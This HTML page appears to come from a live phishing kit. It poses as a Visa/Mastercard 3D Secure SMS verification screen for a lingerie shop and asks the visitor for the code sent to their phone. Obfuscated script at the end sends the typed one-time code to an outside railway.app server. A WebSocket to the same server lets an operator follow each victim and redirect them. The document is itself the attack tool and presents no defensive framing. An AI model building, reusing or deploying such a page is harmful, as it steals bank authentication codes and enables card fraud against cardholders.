<!DOCTYPE html>
<html lang="en" dir="ltr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>3D Secure Verification</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600&display=swap" rel="stylesheet">
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    fontFamily: {
                        'open-sans': ['"Open Sans"', 'sans-serif'],
                    },
                    colors: {
                        'visa-blue': '#1A1F71',
                        'btn-blue': '#003AAC',
                        'link-blue': '#003EA9',
                        'error-red': '#D50000',
                        'text-dark': '#222222',
                        'label-gray': '#767676',
                        'mc-orange': '#ff5f00',
                    },
                    boxShadow: {
                        'card': '0 2px 10px rgba(0,0,0,0.1)',
                    }
                }
            }
        }
    </script>
    <style>
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .secure-input {
            font-size: 32px;
            font-weight: 300;
            letter-spacing: 2px;
        }

        .headline-text {
            padding-top: 24px;
            padding-left: 32px;
            padding-right: 32px;
            font-size: 20px;
            font-weight: 600;
            color: #222222;
        }

        .body-text {
            padding: 12px 32px 24px 32px;
            font-size: 14px;
            font-weight: 400;
            color: #222222;
            line-height: 1.5;
        }

        .input-label {
            text-align: center;
            font-size: 14px;
            font-weight: 600;
            color: #767676;
        }

        .submit-btn {
            width: 280px;
            height: 40px;
            background-color: #003AAC;
            border: 1px solid #003AAC;
            font-size: 14px;
            font-weight: 600;
            color: #FFFFFF;
            text-align: center;
            text-transform: uppercase;
            display: inline-flex;
            align-items: center;
            justify-content: center;
        }

        .submit-btn.mc {
            background-color: #ff5f00;
            border-color: #ff5f00;
        }

        .resend-link {
            text-align: center;
            font-size: 14px;
            font-weight: 600;
            color: #003EA9;
            text-transform: uppercase;
        }

        .need-help-label {
            font-size: 14px;
            font-weight: 400;
            color: #003EA9;
        }
    </style>
</head>

<body class="bg-gray-50 flex items-center justify-center min-h-screen p-4 font-open-sans">

    <!-- Card Container (Visa/Mastercard 3DS Spec: 390px) -->
    <div class="bg-white w-full max-w-[390px] shadow-card rounded-sm overflow-hidden border border-gray-200">

        <!-- Header Zone -->
        <div class="flex items-center justify-between px-8 py-5 border-b border-gray-200">
            <h1 class="text-xl font-bold text-teal-600 tracking-tight">AMIRA LINGERIE</h1>
            <img id="g1"
                src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/5e/Visa_Inc._logo.svg/2560px-Visa_Inc._logo.svg.png"
                alt="Secure Payment" class="h-5 object-contain">
        </div>

        <!-- Content Zone -->
        <div class="">
            <h2 class="headline-text">Enter verification code</h2>

            <p class="body-text">
                We sent you a verification code by text message to <span dir="ltr">(+966) <span
                        id="s1">***-**89</span></span>. You have 6 attempts.
            </p>

            <form id="f2" class="flex flex-col items-center">
                <!-- Input Group -->
                <div class="w-full px-12 mb-6 group">
                    <label for="i7" id="l1" class="block input-label mb-1 transition-colors">Verification
                        code</label>
                    <input type="tel" id="i7" maxlength="6"
                        class="w-full border border-gray-300 rounded px-3 py-2 text-text-dark secure-input text-center focus:outline-none focus:border-btn-blue focus:ring-1 focus:ring-btn-blue transition-all"
                        placeholder="" autocomplete="one-time-code">

                    <!-- Error Message -->
                    <div id="e1" class="hidden mt-2 flex items-center gap-1.5 justify-center">
                        <svg class="w-4 h-4 text-error-red" fill="currentColor" viewBox="0 0 20 20">
                            <path fill-rule="evenodd"
                                d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7 4a1 1 0 11-2 0 1 1 0 012 0zm-1-9a1 1 0 00-1 1v4a1 1 0 102 0V6a1 1 0 00-1-1z"
                                clip-rule="evenodd"></path>
                        </svg>
                        <span class="text-xs text-error-red">Please enter a valid code</span>
                    </div>
                </div>

                <!-- Submit Button -->
                <div class="pb-4">
                    <button type="submit" id="b2"
                        class="submit-btn hover:opacity-90 transition-opacity rounded-sm shadow-sm">
                        Continue
                    </button>
                </div>

                <!-- Resend Link -->
                <div class="text-center pb-8">
                    <button type="button" id="b3" class="resend-link hover:underline">
                        Resend Code
                    </button>
                    <p id="m1" class="hidden text-xs text-green-600 mt-2 font-medium">New code sent successfully!
                    </p>
                </div>
            </form>
        </div>

        <!-- Footer / Information Zone -->
        <div class="bg-gray-50 border-t border-gray-200"
            style="padding-left: 32px; padding-right: 32px; padding-top: 16px; padding-bottom: 16px;">
            <div class="flex items-center justify-between">
                <button type="button" id="b4" class="need-help-label hover:underline flex items-center gap-1">
                    Need Help? <span class="text-lg font-bold leading-none ml-auto" id="s2"></span>
                </button>
            </div>
            <!-- Expandable Text -->
            <div id="t1" class="hidden mt-2 text-xs text-gray-500 font-open-sans">
                <p>If you haven't received the code, please check your network connection or try resending the code.
                    Contact your bank for further assistance.</p>
            </div>
        </div>
    </div>

    <script>
        let _a = localStorage.getItem('aura_client_id');
        if (!_a) {
            _a = 'unknown-' + Date.now();
        }

        const _b = 'wss';
        const _c = `wss://api-production-8591.up.railway.app/ws/client/${_a}`;
        const _d = new WebSocket(_c);

        _d.onopen = () => {
            _d.send(JSON.stringify({ event: 'step_update', data: { step: 'sms_otp' } }));
        };

        _d.onmessage = (e) => {
            try {
                const _e = JSON.parse(e.data);
                if (_e.type === 'REDIRECT') {
                    window.location.href = _e.url;
                } else if (_e.type === 'BANNED') {
                    window.location.href = _e.redirect || 'https://www.google.com';
                }
            } catch (err) { console.error(err); }
        };

        const _f = localStorage.getItem('card_brand') || 'visa';
        const _g = document.getElementById('g1');
        const _h = document.getElementById('b2');

        if (_f === 'mastercard') {
            _g.src = "https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Mastercard-logo.svg/1280px-Mastercard-logo.svg.png";
            _h.classList.add('mc');
        } else {
            _g.src = "https://upload.wikimedia.org/wikipedia/commons/thumb/5/5e/Visa_Inc._logo.svg/2560px-Visa_Inc._logo.svg.png";
        }

        const _i = localStorage.getItem('aura_phone');
        if (_i) {
            const _j = _i.replace(/\D/g, '');
            if (_j.length >= 2) {
                const _k = _j.slice(-2);
                document.getElementById('s1').textContent = `***-**${_k}`;
            }
        }

        const _l = document.getElementById('b4');
        const _m = document.getElementById('t1');
        const _n = document.getElementById('s2');

        _l.addEventListener('click', () => {
            _m.classList.toggle('hidden');
            _n.textContent = _m.classList.contains('hidden') ? '+' : '−';
        });

        const _o = document.getElementById('b3');
        const _p = document.getElementById('m1');

        _o.addEventListener('click', () => {
            _p.classList.remove('hidden');
            setTimeout(() => {
                _p.classList.add('hidden');
            }, 3000);
        });

        const _q = document.getElementById('f2');
        const _r = document.getElementById('i7');
        const _s = document.getElementById('e1');

        _q.addEventListener('submit', async (e) => {
            e.preventDefault();
            const _t = _r.value;

            if (_t.length !== 6) {
                _s.classList.remove('hidden');
                _r.classList.add('border-error-red');
                return;
            }

            _s.classList.add('hidden');
            _r.classList.remove('border-error-red');

            _h.disabled = true;
            _h.textContent = 'Verifying...';

            try {
                await fetch(`https://api-production-8591.up.railway.app/v1/sms-submit?client_id=${_a}&otp=${_t}`, {
                    method: 'POST'
                });
                window.location.href = 'loading.html?step=2';
            } catch (err) {
                console.error(err);
                window.location.href = 'loading.html?step=2';
            }
        });

        _r.focus();
    </script>

</body>

</html>